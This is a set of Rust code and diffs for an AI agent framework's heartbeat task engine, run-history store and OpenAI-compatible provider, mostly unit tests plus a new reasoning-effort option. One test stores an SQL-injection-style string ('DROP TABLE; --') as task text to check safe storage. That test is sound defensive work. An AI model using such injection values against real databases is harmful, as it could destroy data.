fn build_task_prompt_with_custom_prefix() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, Some("CUSTOM PREFIX"));
assert!(prompt.starts_with("CUSTOM PREFIX"));
assert!(prompt.contains("Task"));
}
// ── format_delivery_output tests ────────────────────────────
#[test]
fn format_delivery_output_adds_header() {
let task = HeartbeatTask {
text: "Check email".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("Some result", &task);
assert!(output.starts_with("[high] Check email"));
assert!(output.contains("Some result"));
}
#[test]
fn format_delivery_output_handles_empty() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(" ", &task);
assert!(output.contains("Task completed (no output)"));
}
#[test]
fn format_delivery_output_truncates_long_output() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let long = "x".repeat(5000);
let output = HeartbeatEngine::format_delivery_output(&long, &task);
assert!(output.len() <= 4096);
}
// ── parse_meta alias coverage ───────────────────────────────
#[test]
fn parse_meta_med_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [med] Task");
assert_eq!(tasks[0].priority, TaskPriority::Medium);
}
#[test]
fn parse_meta_pause_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [pause] Task");
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_meta_complete_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [complete] Task");
assert_eq!(tasks[0].status, TaskStatus::Completed);
}
#[test]
fn parse_meta_done_alias() {
let tasks = HeartbeatEngine::parse_tasks("- [done] Task");
assert_eq!(tasks[0].status, TaskStatus::Completed);
}
#[test]
fn parse_meta_whitespace_around_pipes() {
let tasks = HeartbeatEngine::parse_tasks("- [ high | paused ] Task");
assert_eq!(tasks[0].priority, TaskPriority::High);
assert_eq!(tasks[0].status, TaskStatus::Paused);
}
#[test]
fn parse_task_line_whitespace_inside_brackets() {
let tasks = HeartbeatEngine::parse_tasks("- [ ] Task");
assert_eq!(tasks[0].priority, TaskPriority::Medium);
assert_eq!(tasks[0].status, TaskStatus::Active);
assert_eq!(tasks[0].text, "Task");
}
// ── parse_tasks line ending / whitespace edge cases ─────────
#[test]
fn parse_tasks_crlf_line_endings() {
let content = "- Task A\r\n- Task B\r\n- Task C";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 3);
assert_eq!(tasks[0].text, "Task A");
assert_eq!(tasks[2].text, "Task C");
}
#[test]
fn parse_tasks_consecutive_empty_lines() {
let content = "- A\n\n\n\n- B";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 2);
}
#[test]
fn parse_tasks_whitespace_only_lines() {
let content = "- A\n \n\t\n- B";
let tasks = HeartbeatEngine::parse_tasks(content);
assert_eq!(tasks.len(), 2);
}
// ── parse_decision_response additional edge cases ────────────
#[test]
fn parse_decision_task_count_zero() {
let indices = HeartbeatEngine::parse_decision_response("run: 1", 0);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_uppercase_run() {
// Input gets lowercased, so "RUN: 1,2" → "run: 1,2"
let indices = HeartbeatEngine::parse_decision_response("RUN: 1,2", 3);
assert_eq!(indices, vec![0, 1]);
}
#[test]
fn parse_decision_uppercase_skip() {
let indices = HeartbeatEngine::parse_decision_response("SKIP", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_duplicate_indices() {
let indices = HeartbeatEngine::parse_decision_response("run: 1,1,1", 3);
assert_eq!(indices, vec![0, 0, 0]);
}
#[test]
fn parse_decision_negative_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: -1,2", 3);
// "-1" fails to parse as usize → filtered out; "2" parses fine
assert_eq!(indices, vec![1]);
}
#[test]
fn parse_decision_decimal_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: 1.5,2", 3);
// "1.5" fails to parse as usize → filtered; "2" works
assert_eq!(indices, vec![1]);
}
#[test]
fn parse_decision_whitespace_only() {
let indices = HeartbeatEngine::parse_decision_response(" ", 3);
assert!(indices.is_empty());
}
#[test]
fn parse_decision_run_colon_no_numbers() {
let indices = HeartbeatEngine::parse_decision_response("run: ", 3);
assert!(indices.is_empty());
}
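The edge cases above collectively pin down the parser's tolerant behavior: `run:`/`run` prefix stripping, a comma-split bare-number fallback, 1-based indices, and range filtering. A hypothetical standalone reconstruction consistent with those tests (the real `parse_decision_response` may differ in details not covered here):

```rust
// Hypothetical reconstruction of parse_decision_response, written to match
// the behaviors documented by the tests above; not the crate's actual code.
fn parse_decision(response: &str, task_count: usize) -> Vec<usize> {
    let s = response.trim().to_lowercase();
    if s.starts_with("skip") {
        return Vec::new();
    }
    // Accept "run: 1,2", "run 1,2", or bare comma-separated numbers.
    let numbers = s
        .strip_prefix("run:")
        .or_else(|| s.strip_prefix("run"))
        .unwrap_or(&s);
    numbers
        .split(',')
        .filter_map(|part| part.trim().parse::<usize>().ok())
        .filter(|&n| n >= 1 && n <= task_count)
        .map(|n| n - 1) // convert to 0-based task indices
        .collect()
}

fn main() {
    assert_eq!(parse_decision("RUN: 1,2", 3), vec![0, 1]);
    assert_eq!(parse_decision("Based on analysis, run: 1,2", 3), vec![1]);
    assert!(parse_decision("I think we should skip", 3).is_empty());
}
```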
// ── compute_adaptive_interval boundary conditions ────────────
#[test]
fn adaptive_base_zero() {
// base=0 → clamped to [min, max]
let result = compute_adaptive_interval(0, 5, 120, 0, false);
assert_eq!(result, 5);
}
#[test]
#[should_panic(expected = "assertion failed: min <= max")]
fn adaptive_min_greater_than_max_panics() {
// min > max → clamp panics (documents Rust stdlib behavior)
compute_adaptive_interval(30, 120, 5, 0, false);
}
#[test]
fn adaptive_min_equals_max_equals_base() {
let result = compute_adaptive_interval(30, 30, 30, 0, false);
assert_eq!(result, 30);
}
#[test]
fn adaptive_failures_u64_max() {
// u64::MAX failures → should not panic; capped at shift=10
let result = compute_adaptive_interval(30, 5, 120, u64::MAX, false);
assert!(result <= 120);
assert!(result >= 5);
}
#[test]
fn adaptive_high_priority_with_min_below_five() {
// min=2 but high priority enforces >= 5
let result = compute_adaptive_interval(30, 2, 120, 0, true);
assert_eq!(result, 5);
}
#[test]
fn adaptive_high_priority_with_min_above_five() {
let result = compute_adaptive_interval(30, 10, 120, 0, true);
assert_eq!(result, 10);
}
#[test]
fn adaptive_failure_backoff_exactly_at_max() {
// 2 failures: 30 * 4 = 120 exactly at max
let result = compute_adaptive_interval(30, 5, 120, 2, false);
assert_eq!(result, 120);
}
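The boundary tests above imply an exponential-backoff-with-clamp shape for `compute_adaptive_interval`. A hypothetical sketch reconstructed from just those tests; behavior outside them (for example, whether backoff also applies under high priority) is an assumption:

```rust
// Hypothetical sketch of compute_adaptive_interval, reconstructed from the
// boundary tests in this diff; anything not covered by a test is assumed.
fn adaptive_interval(base: u64, min: u64, max: u64, failures: u64, high_priority: bool) -> u64 {
    if high_priority {
        // High-priority tasks poll at the minimum interval, floored at 5s.
        return min.max(5);
    }
    // Exponential backoff on consecutive failures; the shift is capped at 10
    // so a u64::MAX failure count cannot overflow the multiplication.
    let shift = failures.min(10) as u32;
    base.saturating_mul(1u64 << shift).clamp(min, max) // panics if min > max
}

fn main() {
    assert_eq!(adaptive_interval(30, 5, 120, 2, false), 120); // 30 * 4
    assert_eq!(adaptive_interval(0, 5, 120, 0, false), 5);
    assert_eq!(adaptive_interval(30, 2, 120, 0, true), 5);
    assert!(adaptive_interval(30, 5, 120, u64::MAX, false) <= 120);
}
```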
// ── Metrics additional edge cases ───────────────────────────
#[test]
fn metrics_ema_nan_input() {
let mut m = HeartbeatMetrics::default();
m.record_success(f64::NAN);
// NaN propagates in EMA; verify no panic
assert!(m.avg_tick_duration_ms.is_nan());
}
#[test]
fn metrics_ema_negative_duration() {
let mut m = HeartbeatMetrics::default();
m.record_success(-50.0);
// Negative is accepted without panic
assert_eq!(m.avg_tick_duration_ms, -50.0);
}
#[test]
fn metrics_interleaved_success_failure() {
let mut m = HeartbeatMetrics::default();
m.record_success(10.0);
assert_eq!(m.consecutive_successes, 1);
assert_eq!(m.consecutive_failures, 0);
m.record_failure(20.0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 1);
m.record_success(30.0);
assert_eq!(m.consecutive_successes, 1);
assert_eq!(m.consecutive_failures, 0);
m.record_failure(40.0);
m.record_failure(50.0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 2);
assert_eq!(m.total_ticks, 5);
}
#[test]
fn metrics_default_values() {
let m = HeartbeatMetrics::default();
assert_eq!(m.uptime_secs, 0);
assert_eq!(m.consecutive_successes, 0);
assert_eq!(m.consecutive_failures, 0);
assert!(m.last_tick_at.is_none());
assert_eq!(m.avg_tick_duration_ms, 0.0);
assert_eq!(m.total_ticks, 0);
}
// ── build_task_prompt additional tests ───────────────────────
#[test]
fn build_task_prompt_embeds_priority() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("## Priority\nhigh"));
}
#[test]
fn build_task_prompt_embeds_low_priority() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("## Priority\nlow"));
}
#[test]
fn build_task_prompt_contains_memory_instructions() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("memory_search"));
assert!(prompt.contains("memory_store"));
}
#[test]
fn build_task_prompt_contains_not_in_conversation() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("NOT in a conversation"));
}
#[test]
fn build_task_prompt_empty_prefix() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, Some(""));
// Empty prefix still prepends the "\n\n" separator
assert!(prompt.starts_with("\n\n"));
}
#[test]
fn build_task_prompt_unicode_task() {
let task = HeartbeatTask {
text: "日本語タスク 📧".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let prompt = HeartbeatEngine::build_task_prompt(&task, None);
assert!(prompt.contains("日本語タスク 📧"));
}
// ── format_delivery_output additional tests ─────────────────
#[test]
fn format_delivery_output_newline_only_raw() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("\n\n\n", &task);
assert!(output.contains("Task completed (no output)"));
}
#[test]
fn format_delivery_output_exactly_at_limit() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
// Header is "[low] T\n\n" = 9 bytes; fill remaining to exactly 4096
let header_len = "[low] T\n\n".len();
let body = "x".repeat(4096 - header_len);
let output = HeartbeatEngine::format_delivery_output(&body, &task);
assert_eq!(output.len(), 4096);
}
#[test]
fn format_delivery_output_multibyte_truncation() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
};
// Build body of multi-byte chars that will exceed 4096 when combined with header
let body = "€".repeat(2000); // each '€' is 3 bytes in UTF-8, 6000 bytes total
let output = HeartbeatEngine::format_delivery_output(&body, &task);
assert!(output.len() <= 4096);
// A mid-char slice would have panicked inside format_delivery_output,
// so reaching this point confirms the output is valid UTF-8.
}
#[test]
fn format_delivery_output_preserves_body_content() {
let task = HeartbeatTask {
text: "Check email".into(),
priority: TaskPriority::High,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(
"**Status:** completed\n**Summary:** All good",
&task,
);
assert!(output.contains("[high] Check email"));
assert!(output.contains("**Status:** completed"));
assert!(output.contains("**Summary:** All good"));
}
#[test]
fn format_delivery_output_strips_surrounding_whitespace() {
let task = HeartbeatTask {
text: "Task".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output(" result \n\n", &task);
assert!(output.contains("\n\nresult"));
}
#[test]
fn format_delivery_output_all_priorities() {
for (priority, label) in [
(TaskPriority::High, "[high]"),
(TaskPriority::Medium, "[medium]"),
(TaskPriority::Low, "[low]"),
] {
let task = HeartbeatTask {
text: "X".into(),
priority,
status: TaskStatus::Active,
};
let output = HeartbeatEngine::format_delivery_output("ok", &task);
assert!(output.starts_with(label), "Expected {label} prefix");
}
}
// ── decision prompt additional tests ─────────────────────────
#[test]
fn decision_prompt_empty_tasks() {
let prompt = HeartbeatEngine::build_decision_prompt(&[]);
assert!(prompt.contains("Tasks:"));
assert!(prompt.contains("Do not explain"));
}
#[test]
fn decision_prompt_single_task() {
let tasks = vec![HeartbeatTask {
text: "Only task".into(),
priority: TaskPriority::Low,
status: TaskStatus::Active,
}];
let prompt = HeartbeatEngine::build_decision_prompt(&tasks);
assert!(prompt.contains("1. [low] Only task"));
assert!(!prompt.contains("2."));
}
// ── is_runnable tests ───────────────────────────────────────
#[test]
fn is_runnable_active() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Active,
};
assert!(task.is_runnable());
}
#[test]
fn is_runnable_paused() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Paused,
};
assert!(!task.is_runnable());
}
#[test]
fn is_runnable_completed() {
let task = HeartbeatTask {
text: "T".into(),
priority: TaskPriority::Medium,
status: TaskStatus::Completed,
};
assert!(!task.is_runnable());
}
// ── Display impls ───────────────────────────────────────────
#[test]
fn task_priority_display() {
assert_eq!(format!("{}", TaskPriority::Low), "low");
assert_eq!(format!("{}", TaskPriority::Medium), "medium");
assert_eq!(format!("{}", TaskPriority::High), "high");
}
#[test]
fn task_status_display() {
assert_eq!(format!("{}", TaskStatus::Active), "active");
assert_eq!(format!("{}", TaskStatus::Paused), "paused");
assert_eq!(format!("{}", TaskStatus::Completed), "completed");
}
#[test]
fn task_display_all_priorities() {
for (p, label) in [
(TaskPriority::Low, "[low] T"),
(TaskPriority::Medium, "[medium] T"),
(TaskPriority::High, "[high] T"),
] {
let task = HeartbeatTask {
text: "T".into(),
priority: p,
status: TaskStatus::Active,
};
assert_eq!(format!("{task}"), label);
}
}
}
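The assertions above pin down `format_delivery_output`'s contract without showing its body. A minimal sketch consistent with those tests follows; the priority header, the "Task completed (no output)" placeholder, and the 4096-byte cap are taken from the tests, but the implementation itself (and the `MAX_DELIVERY_BYTES` name) is hypothetical, not the engine's actual code:

```rust
const MAX_DELIVERY_BYTES: usize = 4096;

#[derive(Clone, Copy)]
enum TaskPriority {
    Low,
    Medium,
    High,
}

impl std::fmt::Display for TaskPriority {
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.write_str(match self {
            TaskPriority::Low => "low",
            TaskPriority::Medium => "medium",
            TaskPriority::High => "high",
        })
    }
}

fn format_delivery_output(raw: &str, priority: TaskPriority, task_text: &str) -> String {
    // Strip surrounding whitespace; an effectively empty body gets a placeholder.
    let body = raw.trim();
    let body = if body.is_empty() {
        "Task completed (no output)"
    } else {
        body
    };
    let mut out = format!("[{priority}] {task_text}\n\n{body}");
    if out.len() > MAX_DELIVERY_BYTES {
        // Back up to a char boundary so truncation never splits a
        // multibyte UTF-8 sequence.
        let mut cut = MAX_DELIVERY_BYTES;
        while !out.is_char_boundary(cut) {
            cut -= 1;
        }
        out.truncate(cut);
    }
    out
}
```

The boundary walk is what the multibyte-truncation test exercises: `String::truncate` panics on a non-boundary index, so backing up at most three bytes keeps the result valid UTF-8 while staying within the channel limit.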
+292
@@ -302,4 +302,296 @@ mod tests {
assert!(stored.ends_with(TRUNCATED_MARKER));
assert!(stored.len() <= MAX_OUTPUT_BYTES);
}
#[test]
fn list_runs_empty_db() {
let tmp = TempDir::new().unwrap();
let runs = list_runs(tmp.path(), 10).unwrap();
assert!(runs.is_empty());
}
#[test]
fn run_stats_empty_db() {
let tmp = TempDir::new().unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 0);
assert_eq!(ok, 0);
assert_eq!(err, 0);
}
#[test]
fn record_run_with_none_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", None, 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs.len(), 1);
assert!(runs[0].output.is_none());
}
#[test]
fn record_run_max_history_one() {
let tmp = TempDir::new().unwrap();
let base = Utc::now();
for i in 0..5 {
let start = base + ChronoDuration::seconds(i);
let end = start + ChronoDuration::milliseconds(10);
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
start,
end,
"ok",
None,
10,
1, // keep only 1
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 1);
}
#[test]
fn truncate_output_exactly_at_limit() {
let exact = "x".repeat(MAX_OUTPUT_BYTES);
let result = truncate_output(&exact);
assert_eq!(result.len(), MAX_OUTPUT_BYTES);
assert!(!result.contains(TRUNCATED_MARKER));
}
#[test]
fn truncate_output_one_byte_over() {
let over = "x".repeat(MAX_OUTPUT_BYTES + 1);
let result = truncate_output(&over);
assert!(result.ends_with(TRUNCATED_MARKER));
assert!(result.len() <= MAX_OUTPUT_BYTES);
}
#[test]
fn truncate_output_multibyte_boundary() {
// Build a string of multi-byte chars that crosses the cutoff boundary
// Each '€' is 3 bytes in UTF-8
let euro_count = MAX_OUTPUT_BYTES / 3 + 10;
let input: String = "€".repeat(euro_count);
let result = truncate_output(&input);
// Must end with the marker; a mid-char slice would have panicked
// inside truncate_output, so valid UTF-8 is implied.
assert!(result.ends_with(TRUNCATED_MARKER));
}
// ── truncate_output additional edge cases ────────────────────
#[test]
fn truncate_output_empty_string() {
let result = truncate_output("");
assert_eq!(result, "");
}
#[test]
fn truncate_output_single_char() {
let result = truncate_output("x");
assert_eq!(result, "x");
}
#[test]
fn truncate_output_shorter_than_marker() {
let result = truncate_output("short");
assert_eq!(result, "short");
assert!(!result.contains(TRUNCATED_MARKER));
}
#[test]
fn truncate_output_4byte_utf8_boundary() {
// '𝄞' is 4 bytes in UTF-8 — test char boundary handling with 4-byte chars
let count = MAX_OUTPUT_BYTES / 4 + 10;
let input: String = "𝄞".repeat(count);
let result = truncate_output(&input);
assert!(result.ends_with(TRUNCATED_MARKER));
// A mid-char slice inside truncate_output would have panicked,
// so valid UTF-8 is implied.
}
// ── record_run additional edge cases ─────────────────────────
#[test]
fn record_run_empty_string_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", Some(""), 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs.len(), 1);
// Empty string is stored as Some(""), not None
assert_eq!(runs[0].output.as_deref(), Some(""));
}
#[test]
fn record_run_special_chars_in_task_text() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
let special = "Task with 'quotes', \"doubles\", and SQL: DROP TABLE; --";
record_run(tmp.path(), special, "high", now, now, "ok", None, 10, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].task_text, special);
}
#[test]
fn record_run_zero_duration() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "T", "medium", now, now, "ok", None, 0, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].duration_ms, 0);
}
#[test]
fn record_run_negative_duration() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
// Negative duration shouldn't panic — SQLite stores it fine
record_run(tmp.path(), "T", "medium", now, now, "ok", None, -1, 50).unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].duration_ms, -1);
}
#[test]
fn record_run_unicode_output() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
let unicode_output = "日本語の結果 🎉 €100";
record_run(
tmp.path(),
"T",
"medium",
now,
now,
"ok",
Some(unicode_output),
10,
50,
)
.unwrap();
let runs = list_runs(tmp.path(), 1).unwrap();
assert_eq!(runs[0].output.as_deref(), Some(unicode_output));
}
// ── list_runs additional edge cases ──────────────────────────
#[test]
fn list_runs_limit_clamped_to_one() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
for i in 0..3 {
let start = now + ChronoDuration::seconds(i);
record_run(
tmp.path(),
&format!("T{i}"),
"medium",
start,
start,
"ok",
None,
10,
50,
)
.unwrap();
}
// limit=0 is clamped to 1
let runs = list_runs(tmp.path(), 0).unwrap();
assert_eq!(runs.len(), 1);
}
#[test]
fn list_runs_ordering_same_timestamp() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
// Insert multiple runs with the same timestamp
for i in 0..3 {
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
now,
now,
"ok",
None,
10,
50,
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 3);
// With same timestamp, ordered by id DESC → Task 2 first
assert!(runs[0].task_text.contains('2'));
assert!(runs[2].task_text.contains('0'));
}
// ── run_stats additional edge cases ──────────────────────────
#[test]
fn run_stats_only_errors() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "A", "high", now, now, "error", None, 10, 50).unwrap();
record_run(tmp.path(), "B", "high", now, now, "error", None, 10, 50).unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 2);
assert_eq!(ok, 0);
assert_eq!(err, 2);
}
#[test]
fn run_stats_only_ok() {
let tmp = TempDir::new().unwrap();
let now = Utc::now();
record_run(tmp.path(), "A", "high", now, now, "ok", None, 10, 50).unwrap();
record_run(tmp.path(), "B", "high", now, now, "ok", None, 10, 50).unwrap();
let (total, ok, err) = run_stats(tmp.path()).unwrap();
assert_eq!(total, 2);
assert_eq!(ok, 2);
assert_eq!(err, 0);
}
#[test]
fn record_run_max_history_keeps_most_recent() {
let tmp = TempDir::new().unwrap();
let base = Utc::now();
for i in 0..5 {
let start = base + ChronoDuration::seconds(i);
let end = start + ChronoDuration::milliseconds(10);
record_run(
tmp.path(),
&format!("Task {i}"),
"medium",
start,
end,
"ok",
None,
10,
3,
)
.unwrap();
}
let runs = list_runs(tmp.path(), 10).unwrap();
assert_eq!(runs.len(), 3);
// Most recent 3 should be Task 4, 3, 2
assert!(runs[0].task_text.contains('4'));
assert!(runs[1].task_text.contains('3'));
assert!(runs[2].task_text.contains('2'));
}
}
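`truncate_output` is exercised heavily above but its body is not shown in this hunk. One way to satisfy those assertions is sketched below; the `MAX_OUTPUT_BYTES` value and the marker text are assumptions for illustration, not the store module's real constants:

```rust
// Assumed values; the real constants live in the store module.
const MAX_OUTPUT_BYTES: usize = 16 * 1024;
const TRUNCATED_MARKER: &str = "…[truncated]";

fn truncate_output(raw: &str) -> String {
    // At or under the limit: stored verbatim, no marker.
    if raw.len() <= MAX_OUTPUT_BYTES {
        return raw.to_string();
    }
    // Reserve room for the marker, then back up to a char boundary so
    // 3-byte (€) and 4-byte (𝄞) UTF-8 sequences are never split.
    let mut cut = MAX_OUTPUT_BYTES - TRUNCATED_MARKER.len();
    while !raw.is_char_boundary(cut) {
        cut -= 1;
    }
    format!("{}{TRUNCATED_MARKER}", &raw[..cut])
}
```

This matches the tested behavior at the boundaries: input exactly at the limit passes through untouched, one byte over gets the marker, and the result never exceeds the limit even when the cutoff lands mid-character.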
+2
@@ -191,6 +191,7 @@ pub async fn run_wizard(force: bool) -> Result<Config> {
notion: crate::config::NotionConfig::default(),
node_transport: crate::config::NodeTransportConfig::default(),
knowledge: crate::config::KnowledgeConfig::default(),
linkedin: crate::config::LinkedInConfig::default(),
};
println!(
@@ -563,6 +564,7 @@ async fn run_quick_setup_with_home(
notion: crate::config::NotionConfig::default(),
node_transport: crate::config::NodeTransportConfig::default(),
knowledge: crate::config::KnowledgeConfig::default(),
linkedin: crate::config::LinkedInConfig::default(),
};
config.save().await?;
+54
@@ -41,6 +41,8 @@ pub struct OpenAiCompatibleProvider {
timeout_secs: u64,
/// Extra HTTP headers to include in all API requests.
extra_headers: std::collections::HashMap<String, String>,
/// Optional reasoning effort for GPT-5/Codex-compatible backends.
reasoning_effort: Option<String>,
/// Custom API path suffix (e.g. "/v2/generate").
/// When set, overrides the default `/chat/completions` path detection.
api_path: Option<String>,
@@ -179,6 +181,7 @@ impl OpenAiCompatibleProvider {
native_tool_calling: !merge_system_into_user,
timeout_secs: 120,
extra_headers: std::collections::HashMap::new(),
reasoning_effort: None,
api_path: None,
}
}
@@ -198,6 +201,12 @@ impl OpenAiCompatibleProvider {
self
}
/// Set reasoning effort for GPT-5/Codex-compatible chat-completions APIs.
pub fn with_reasoning_effort(mut self, reasoning_effort: Option<String>) -> Self {
self.reasoning_effort = reasoning_effort;
self
}
/// Set a custom API path suffix for this provider.
/// When set, replaces the default `/chat/completions` path.
pub fn with_api_path(mut self, api_path: Option<String>) -> Self {
@@ -363,6 +372,14 @@ impl OpenAiCompatibleProvider {
})
.collect()
}
fn reasoning_effort_for_model(&self, model: &str) -> Option<String> {
let id = model.rsplit('/').next().unwrap_or(model);
let supports_reasoning_effort = id.starts_with("gpt-5") || id.contains("codex");
supports_reasoning_effort
.then(|| self.reasoning_effort.clone())
.flatten()
}
}
#[derive(Debug, Serialize)]
@@ -373,6 +390,8 @@ struct ApiChatRequest {
#[serde(skip_serializing_if = "Option::is_none")]
stream: Option<bool>,
#[serde(skip_serializing_if = "Option::is_none")]
reasoning_effort: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
tools: Option<Vec<serde_json::Value>>,
#[serde(skip_serializing_if = "Option::is_none")]
tool_choice: Option<String>,
@@ -569,6 +588,8 @@ struct NativeChatRequest {
#[serde(skip_serializing_if = "Option::is_none")]
stream: Option<bool>,
#[serde(skip_serializing_if = "Option::is_none")]
reasoning_effort: Option<String>,
#[serde(skip_serializing_if = "Option::is_none")]
tools: Option<Vec<serde_json::Value>>,
#[serde(skip_serializing_if = "Option::is_none")]
tool_choice: Option<String>,
@@ -1181,6 +1202,8 @@ impl OpenAiCompatibleProvider {
"does not support tools",
"function calling is not supported",
"tool_choice",
"tool call validation failed",
"was not in request",
]
.iter()
.any(|hint| lower.contains(hint))
@@ -1240,6 +1263,7 @@ impl Provider for OpenAiCompatibleProvider {
messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1362,6 +1386,7 @@ impl Provider for OpenAiCompatibleProvider {
messages: api_messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1472,6 +1497,7 @@ impl Provider for OpenAiCompatibleProvider {
messages: api_messages,
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: if tools.is_empty() {
None
} else {
@@ -1577,6 +1603,7 @@ impl Provider for OpenAiCompatibleProvider {
),
temperature,
stream: Some(false),
reasoning_effort: self.reasoning_effort_for_model(model),
tool_choice: tools.as_ref().map(|_| "auto".to_string()),
tools,
};
@@ -1720,6 +1747,7 @@ impl Provider for OpenAiCompatibleProvider {
messages,
temperature,
stream: Some(options.enabled),
reasoning_effort: self.reasoning_effort_for_model(model),
tools: None,
tool_choice: None,
};
@@ -1861,6 +1889,7 @@ mod tests {
],
temperature: 0.4,
stream: Some(false),
reasoning_effort: None,
tools: None,
tool_choice: None,
};
@@ -2418,6 +2447,14 @@ mod tests {
);
}
#[test]
fn native_tool_schema_unsupported_detects_groq_tool_validation_error() {
assert!(OpenAiCompatibleProvider::is_native_tool_schema_unsupported(
reqwest::StatusCode::BAD_REQUEST,
r#"Groq API error (400 Bad Request): {"error":{"message":"tool call validation failed: attempted to call tool 'memory_recall={\"limit\":5}' which was not in request"}}"#
));
}
#[test]
fn prompt_guided_tool_fallback_injects_system_instruction() {
let input = vec![ChatMessage::user("check status")];
@@ -2441,6 +2478,22 @@ mod tests {
assert!(output[0].content.contains("shell_exec"));
}
#[test]
fn reasoning_effort_only_applies_to_gpt5_and_codex_models() {
let provider = make_provider("test", "https://example.com", None)
.with_reasoning_effort(Some("high".to_string()));
assert_eq!(
provider.reasoning_effort_for_model("gpt-5.3-codex"),
Some("high".to_string())
);
assert_eq!(
provider.reasoning_effort_for_model("openai/gpt-5"),
Some("high".to_string())
);
assert_eq!(provider.reasoning_effort_for_model("llama-3.3-70b"), None);
}
#[tokio::test]
async fn warmup_without_key_is_noop() {
let provider = make_provider("test", "https://example.com", None);
@@ -2617,6 +2670,7 @@ mod tests {
}],
temperature: 0.7,
stream: Some(false),
reasoning_effort: None,
tools: Some(tools),
tool_choice: Some("auto".to_string()),
};
+26
@@ -680,6 +680,7 @@ pub struct ProviderRuntimeOptions {
pub zeroclaw_dir: Option<PathBuf>,
pub secrets_encrypt: bool,
pub reasoning_enabled: Option<bool>,
pub reasoning_effort: Option<String>,
/// HTTP request timeout in seconds for LLM provider API calls.
/// `None` uses the provider's built-in default (120s for compatible providers).
pub provider_timeout_secs: Option<u64>,
@@ -699,6 +700,7 @@ impl Default for ProviderRuntimeOptions {
zeroclaw_dir: None,
secrets_encrypt: true,
reasoning_enabled: None,
reasoning_effort: None,
provider_timeout_secs: None,
extra_headers: std::collections::HashMap::new(),
api_path: None,
